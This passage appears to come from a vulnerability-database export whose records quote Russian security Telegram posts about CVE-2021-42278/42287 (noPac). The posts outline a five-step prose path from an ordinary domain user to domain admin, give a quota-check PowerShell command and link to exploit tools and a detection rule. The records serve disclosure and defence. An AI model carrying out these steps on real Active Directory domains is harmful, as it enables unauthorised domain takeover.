\u043f\u0440\u043e\u043f\u0443\u0441\u0442\u0438\u0442\u0435 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 DC, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0443\u0434\u0430\u043b\u0435\u043d\u044b \u0438\u0437 Primary DC. \u0414\u043b\u044f \u0431\u043e\u043b\u044c\u0448\u0435\u0439 \u0442\u043e\u0447\u043d\u043e\u0441\u0442\u0438, \u043e\u043d \u0441\u043a\u0430\u043d\u0438\u0440\u0443\u0435\u0442 Pac, \u0433\u0434\u0435 \u0442\u0438\u043f \u0440\u0430\u0432\u0435\u043d 0x10, \u0447\u0442\u043e \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u043c \u043f\u0430\u0442\u0447\u0435\u043c Microsoft \u0434\u043b\u044f \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.\nhttps://github.com/knightswd/NoPacScan\n\n\u0414\u043d\u0435\u0432\u043d\u0438\u043a \u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u0438\u043a\u0430 \ud83d\udee1", "creation_timestamp": "2022-05-19T07:01:56.000000Z"}, {"uuid": "3e9a8a2b-69c3-417b-a9f0-7bbfb8d39c69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/poxek/2147", "content": "\u0421\u043f\u0443\u0444\u0438\u043d\u0433 sAMAccountName: \u043e\u0442 LowPriv \u0434\u043e \u0434\u043e\u043c\u0435\u043d \u0430\u0434\u043c\u0438\u043d\u0430 \u0437\u0430 \u0448\u0435\u0441\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0427\u0430\u0440\u043b\u0438 \u041a\u043b\u0430\u0440\u043a (@exploitph, \u0438\u0437\u0432\u0435\u0441\u0442\u0435\u043d \u0441\u0432\u043e\u0438\u043c \u0444\u043e\u0440\u043a\u043e\u043c PowerView) \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b \u0441\u0432\u0435\u0436\u0438\u0439 \u0441\u043f\u043e\u0441\u043e\u0431 \u044d\u0441\u043a\u0430\u043b\u0430\u0446\u0438\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 \u0434\u043e\u043c\u0435\u043d\u0435 Active Directory, \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043d\u0430 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 CVE-2021-42287 \u0438 CVE-2021-42278. \u041f\u0430\u0447\u043a\u0430 CVE, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u044d\u0442\u0438\u043c\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c\u0438, \u043a\u0440\u0443\u0442\u0438\u0442\u0441\u044f \u0432 \u0442\u0432\u0438\u0442\u0442\u0435\u0440\u0430\u0445 \u0443\u0436\u0435 \u043e\u043a\u043e\u043b\u043e \u043c\u0435\u0441\u044f\u0446\u0430 \u0438 \u0431\u044b\u043b\u0430 \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u00ab\u043c\u0435\u043b\u043a\u043e\u043c\u044f\u0433\u043a\u0438\u043c\u0438\u00bb \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u043d\u043e\u044f\u0431\u0440\u044c\u0441\u043a\u043e\u0433\u043e Patch Tuesday. \u041d\u043e, \u043a\u0430\u043a \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e, \u043a\u0442\u043e \u043d\u0435 \u0443\u0441\u043f\u0435\u043b, \u0442\u043e\u0442 \u043e\u043f\u043e\u0437\u0434\u0430\u043b, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0434\u043e\u043c\u0435\u043d \u0430\u0434\u043c\u0438\u043d\u0430 \u043c\u044b \u0441 Acrono \u0432\u0441\u0435 \u0436\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438. \u0414\u0430\u043b\u0435\u0435 \u0440\u0430\u0441\u0441\u043a\u0430\u0436\u0443 (\u0438 \u043f\u043e\u043a\u0430\u0436\u0443), \u043a\u0430\u043a \u044d\u0442\u043e \u0434\u0435\u043b\u0430\u0435\u0442\u0441\u044f, \u043d\u043e \u0434\u043b\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u043d\u0435\u043c\u043d\u043e\u0433\u043e \u0442\u0435\u043e\u0440\u0438\u0438.\n\u25b6\ufe0f \u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a\n\n\u0414\u043d\u0435\u0432\u043d\u0438\u043a \u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u0438\u043a\u0430 \ud83d\udee1", "creation_timestamp": "2022-08-07T11:55:48.000000Z"}, {"uuid": "ac23cdec-d17a-4c70-8c23-a41d51927875", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/monkey_hacker/54", "content": "Domain Admin in a few seconds (CVE-2021-42278 | CVE-2021-42287)\n\n\u0422\u0430\u043a\u043e\u0439 \u0441\u043f\u043e\u0441\u043e\u0431 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u0443\u0436\u0435 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u043f\u043e\u0447\u0442\u0438 \u0434\u0432\u0430 \u0433\u043e\u0434\u0430, \u043e\u0434\u043d\u0430\u043a\u043e \u044d\u0442\u043e\u0442 \u0441\u043f\u043e\u0441\u043e\u0431 \u0430\u043a\u0442\u0443\u0430\u043b\u0435\u043d \u0438 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0439. \u0410 \u043a\u0430\u043a\u0438\u0435 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u044b \u043e\u043d\u043e \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442?\n\n1. \u041f\u043e \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u0443 \u0432 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430\u0445, \u043e\u0431\u044b\u0447\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0434\u043e\u043c\u0435\u043d\u0430 \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0441\u043e\u0435\u0434\u0438\u043d\u0438\u0442\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440 \u043a AD \u0442\u043e\u043b\u044c\u043a\u043e 10 \u0440\u0430\u0437. \n\u0427\u0442\u043e\u0431\u044b \u044d\u0442\u043e \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c, \u043c\u043e\u0436\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0443\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u0443:\n\nGet-ADObject -Identity (Get-ADDomain).DistinguishedName -Properties ms-DS-MachineAccountQuota\n\n\u0427\u0442\u043e\u0431\u044b \u043e\u0442\u043b\u0438\u0447\u0430\u0442\u044c \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0437\u0430\u043f\u0438\u0441\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043e\u0442 \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043e\u0432, \u043e\u043d\u0438 \u0434\u043e\u043b\u0436\u043d\u044b \u0438\u043c\u0435\u0442\u044c \u0432 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0435 sAMAccountName \u043d\u0430 \u043a\u043e\u043d\u0446\u0435 $. \u041e\u0434\u043d\u0430\u043a\u043e \u043f\u0440\u0438\u043a\u043e\u043b \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u044d\u0442\u043e\u0442 \u0441\u0438\u043c\u0432\u043e\u043b \u043d\u0435 \u0432\u0441\u0435\u0433\u0434\u0430 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442\u0441\u044f. \u0410\u0442\u0440\u0438\u0431\u0443\u0442\u043e\u043c \u0438\u043c\u0435\u043d\u0438 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f sAMAccountName. \u042d\u0442\u043e\u0442 \u0430\u0442\u0440\u0438\u0431\u0443\u0442 \u043c\u043e\u0436\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u0438 \u043e\u0442\u0440\u0435\u0434\u0430\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0432\u0440\u0443\u0447\u043d\u0443\u044e \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e ADSIEdit Tool\n\n2. \u041f\u0440\u0438 \u0437\u0430\u043f\u0440\u043e\u0441\u0435 \u0431\u0438\u043b\u0435\u0442\u0430 \u043d\u0430 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0435 \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043f\u0440\u0435\u0434\u044a\u044f\u0432\u0438\u0442\u044c TGT. \u0415\u0441\u043b\u0438 \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u043c\u044b\u0439 \u0431\u0438\u043b\u0435\u0442 \u043d\u0435 \u043d\u0430\u0439\u0434\u0435\u043d KDC, KDC \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u043f\u043e\u0432\u0442\u043e\u0440\u043d\u044b\u0439 \u043f\u043e\u0438\u0441\u043a \u0441 \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c $. \u0415\u0441\u043b\u0438 TGT \u043f\u043e\u043b\u0443\u0447\u0435\u043d \u0434\u043b\u044f username, \u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c username \u0443\u0434\u0430\u043b\u0435\u043d, \u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u044d\u0442\u043e\u0442 TGT \u0434\u043b\u044f \u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u0441\u0435\u0440\u0432\u0438\u0441\u043d\u043e\u0433\u043e \u0431\u0438\u043b\u0435\u0442\u0430 \u0434\u043b\u044f \u0434\u0440\u0443\u0433\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0447\u0435\u0440\u0435\u0437  S4U2self  \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u0442 \u043a \u0442\u043e\u043c\u0443, \u0447\u0442\u043e KDC \u0431\u0443\u0434\u0435\u0442 \u0438\u0441\u043a\u0430\u0442\u044c username$ \u0432 AD. \n\n\u041e\u0431\u044a\u0435\u0434\u0438\u043d\u044f\u044f \u044d\u0442\u0438 \u0432\u0443\u043b\u043d\u044b, \u043c\u044b \u0438\u043c\u0435\u0435\u043c \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e \u0442\u0430\u043a\u043e\u0439 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439\n\n\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442 TGT. \u0417\u0430\u0442\u0435\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043f\u044b\u0442\u0430\u0442\u044c\u0441\u044f \u0443\u0434\u0430\u043b\u0438\u0442\u044c \u0438\u043b\u0438 \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u0442\u044c \u0438\u0441\u0445\u043e\u0434\u043d\u0443\u044e \u0443\u0447\u0435\u0442\u043d\u0443\u044e \u0437\u0430\u043f\u0438\u0441\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430. \u041f\u043e\u043b\u0443\u0447\u0438\u0432 TGT, \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u043d\u0430\u0447\u0430\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c sAMAccountName. \u0410 \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u0437\u043d\u0430\u044f, \u0447\u0442\u043e KDC \u043f\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0442\u0438\u043a\u0435\u0442\u044b \u0438 \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0435 \u0441\u0435\u0430\u043d\u0441\u043e\u0432\u044b\u0435 \u043a\u043b\u044e\u0447\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430\u043c \u0432 \u0434\u043e\u043c\u0435\u043d\u0435, \u043c\u044b \u044d\u0442\u043e \u043c\u043e\u0436\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439\n\n\u0421\u0446\u0435\u043d\u0430\u0440\u0438\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u0442\u0430\u043a:\n\n1. \u0412 \u0434\u043e\u043c\u0435\u043d \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u043e\u0432\u0430\u044f \u0443\u0447\u0435\u0442\u043d\u0430\u044f \u0437\u0430\u043f\u0438\u0441\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430.\n2. \u0421\u043e\u0437\u0434\u0430\u043d\u043d\u0430\u044f \u0443\u0447\u0435\u0442\u043d\u0430\u044f \u0437\u0430\u043f\u0438\u0441\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0438\u0438 \u0441 \u0438\u043c\u0435\u043d\u0435\u043c \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0433\u043e \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430\n3. \u0417\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442\u0441\u044f Kerberos TGT \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0438\u043c\u0435\u043d\u0438 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430.\n4. \u0421\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u0435 \u0438\u043c\u044f \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u0441\u043d\u043e\u0432\u0430 \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u0438\u0441\u0445\u043e\u0434\u043d\u043e\u0435  \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435.\n5. \u0421\u0435\u0440\u0432\u0438\u0441\u043d\u044b\u0439 \u0431\u0438\u043b\u0435\u0442 Kerberos \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u044f S4U2self\n\n\u0417\u0432\u0443\u0447\u0438\u0442 \u0434\u0443\u0448\u043d\u043e, \u0431\u043b\u0430\u0433\u043e \u0435\u0441\u0442\u044c noPac, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442 \u0434\u0430\u043d\u043d\u0443\u044e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443\n\nTHX:\n\nhttps://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html\n\nhttps://github.com/elastic/detection-rules/blob/a5359ca675267220afedf67795cd1fd04881b2c8/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml\n\nhttps://github.com/WazeHell/sam-the-admin", "creation_timestamp": "2023-03-16T11:56:00.000000Z"}, {"uuid": "b4016466-e2aa-4dbd-8e67-dc17fe7536f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/bizone_channel/425", "content": "\u041a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u044b\u0439 \u0436\u0438\u043d\u0433\u043b \u0431\u0435\u043b\u0437. \u041f\u043e\u0434\u0431\u043e\u0440\u043a\u0430 \u043d\u043e\u0432\u043e\u0441\u0442\u0435\u0439 \u0437\u0430 \u0434\u0435\u043a\u0430\u0431\u0440\u044c\ud83c\udf84\n\n\u041f\u043e\u0436\u0430\u043b\u0443\u0439, \u0441\u0430\u043c\u044b\u043c \u0433\u0440\u043e\u043c\u043a\u0438\u043c \u0438\u043d\u0444\u043e\u043f\u043e\u0432\u043e\u0434\u043e\u043c \u043c\u0435\u0441\u044f\u0446\u0430 \u0441\u0442\u0430\u043b\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Log4Shell. \u041c\u044b \u0443\u0436\u0435 \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u043b\u0438 \u043e \u043d\u0435\u0439, \u043a\u043e\u0433\u0434\u0430 \u0434\u0435\u043b\u0438\u043b\u0438\u0441\u044c \u0441\u0432\u043e\u0438\u043c \u0441\u043a\u0430\u043d\u0435\u0440\u043e\u043c. \u0422\u0435\u043f\u0435\u0440\u044c \u0445\u043e\u0442\u0438\u043c \u043e\u0441\u0432\u0435\u0442\u0438\u0442\u044c \u0441\u043e\u0431\u044b\u0442\u0438\u044f, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0432\u043b\u0435\u043a\u043b\u043e \u0435\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0434\u0440\u0443\u0433\u0438\u0435 \u043d\u043e\u0432\u043e\u0441\u0442\u0438 \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u0430. \n\n\ud83d\udd10Log4Shell \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u043b\u0430 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u044b\u0435 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b Intel, NVIDIA \u0438 Microsoft \u2014 \u0432\u0441\u0435 \u043e\u043d\u0438 \u043f\u043e\u0432\u0441\u0435\u043c\u0435\u0441\u0442\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0432 \u0431\u0438\u0437\u043d\u0435\u0441\u0435. \u0414\u043b\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432 \u0442\u0430\u043a\u0430\u044f \u0431\u0440\u0435\u0448\u044c \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0439 \u0437\u043e\u043b\u043e\u0442\u043e\u0439 \u0436\u0438\u043b\u043e\u0439. \u0422\u043e\u043b\u044c\u043a\u043e \u043f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Check Point, \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u043e\u0432 \u0434\u043b\u044f \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0443\u0436\u0435 \u043d\u0430\u0441\u0447\u0438\u0442\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0431\u043e\u043b\u0435\u0435 60, \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u0442\u0441\u044f \u0434\u043e 100 \u0430\u0442\u0430\u043a \u0432 \u043c\u0438\u043d\u0443\u0442\u0443. \u041a \u0442\u043e\u043c\u0443 \u0436\u0435 \u0441\u0432\u0435\u0436\u0438\u0439 \u0431\u0430\u0433 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 \u043e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u044b \u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437 \u0441\u0430\u043c\u044b\u0445 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u043d\u044b\u0445 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043b\u044c\u0449\u0438\u043a\u043e\u0432 \u2014 Conti.\n\n\ud83d\udda5Microsoft \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0430 \u043e \u0434\u0432\u0443\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445: CVE-2021-42287 \u0438 CVE-2021-42278, \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043b\u0435\u0433\u043a\u043e \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0434\u043e\u043c\u0435\u043d\u0430\u043c\u0438 Windows. \u042d\u0442\u043e \u0434\u0430\u0435\u0442 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0430\u043c \u043f\u043e\u0447\u0442\u0438 \u0431\u0435\u0437\u0433\u0440\u0430\u043d\u0438\u0447\u043d\u044b\u0435 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0432 \u0441\u0435\u0442\u0438.\n\n\ud83d\udea8Google \u043f\u043e\u0434\u0430\u043b\u0430 \u0432 \u0441\u0443\u0434 \u043d\u0430 \u0434\u0432\u0443\u0445 \u0440\u043e\u0441\u0441\u0438\u044f\u043d \u0437\u0430 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u0431\u043e\u0442\u043d\u0435\u0442\u0430 Glupteba, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0437\u0430\u0440\u0430\u0437\u0438\u043b \u0431\u043e\u043b\u0435\u0435 \u043c\u0438\u043b\u043b\u0438\u043e\u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043e\u0432 \u043d\u0430 \u041e\u0421 Windows. \n\n\ud83c\udfaf\u041f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u044c \u0440\u0435\u0448\u0435\u043d\u0438\u0439 \u0434\u043b\u044f \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0435\u0440\u0441\u043e\u043d\u0430\u043b\u043e\u043c Kronos \u043f\u043e\u0434\u0432\u0435\u0440\u0433\u0441\u044f \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0435 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u041f\u041e, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0432\u044b\u0432\u0435\u043b\u0430 \u0438\u0437 \u0441\u0442\u0440\u043e\u044f \u0435\u0433\u043e \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u0435 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b.\n\n\ud83d\udc41\u0412\u043b\u0430\u0441\u0442\u0438 \u041f\u043e\u043b\u044c\u0448\u0438 \u0443\u043b\u0438\u0447\u0438\u043b\u0438 \u0432 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0438 \u0448\u043f\u0438\u043e\u043d\u0441\u043a\u043e\u0433\u043e \u041f\u041e Pegasus \u0434\u043b\u044f \u0441\u043b\u0435\u0436\u043a\u0438 \u0437\u0430 \u043e\u043f\u043f\u043e\u0437\u0438\u0446\u0438\u0435\u0439. \u0412\u0438\u0434\u0438\u043c\u043e, \u0434\u0430\u0436\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0440\u0430\u0437\u043e\u0431\u043b\u0430\u0447\u0435\u043d\u0438\u0439 \u043d\u0435 \u043c\u0435\u0448\u0430\u0435\u0442 NSO Group \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0442\u044c \u0441\u0432\u043e\u044e \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c.\n\n\ud83d\udd78\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0433\u043e \u043c\u0435\u043d\u0435\u0434\u0436\u0435\u0440\u0430 \u043f\u0430\u0440\u043e\u043b\u0435\u0439 LastPass \u043f\u043e\u043b\u0443\u0447\u0430\u044e\u0442 \u043f\u0438\u0441\u044c\u043c\u0430 \u0441 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f\u043c\u0438, \u0447\u0442\u043e \u043a\u0442\u043e-\u0442\u043e \u043f\u044b\u0442\u0430\u043b\u0441\u044f \u0432\u043e\u0439\u0442\u0438 \u0432 \u0438\u0445 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u044b \u0441 \u043c\u0430\u0441\u0442\u0435\u0440-\u043f\u0430\u0440\u043e\u043b\u0435\u043c. \u042d\u0442\u0430 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430 \u0447\u0430\u0441\u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0438 \u0432 \u043a\u043e\u043c\u043c\u0435\u0440\u0446\u0438\u0438, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u043c \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u0442\u044c \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u043e\u0432.\n\n\u0412\u043e\u0432\u0440\u0435\u043c\u044f 